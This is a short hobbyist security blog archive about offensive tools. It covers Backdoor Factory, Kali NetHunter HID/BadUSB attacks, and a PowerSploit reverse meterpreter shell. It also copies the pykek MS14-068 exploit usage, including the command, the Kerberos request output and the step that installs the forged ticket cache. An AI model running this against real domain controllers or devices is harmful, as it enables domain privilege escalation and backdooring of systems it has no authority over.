Category Archives: Exploit Tools of the Moment

BackDoor Factory

So, I just recently built out a Kali NetHunter Instance on a nexus 7. I was catching this video regarding backdoor factory. All i can say is its pretty slick. Be sure to check it out.

After just a little time with nethunter, the badusb and all the hid attacks seem to be my favorite thus far from light use. The wireless stuff is cool, but still havent found the right need for my personal use that the nexus/otg/usb wireless adapter beat out laptop yet. I hear the nexus 9 supports full monitor mode with the build in device wireless, thats a game changer if it does.

I want to start making some custom actions for the HID attacks, the powersploit reverse meterpreter shell is pretty slick, just thinking of a few others i may want to use myself (all of which will probably derive from that).

MS14-068 fun!

Make sure to check out the python kerberos exploitation kit. And if you haven’t patched your DCs, get on it.

From the pykek github page:

[email protected]:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Creating ccache file '[email protected]'... Done!
[email protected]:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0 

shells_on_shells_on_shells

Also check out this pastebin. http://pastebin.com/fx7efUvS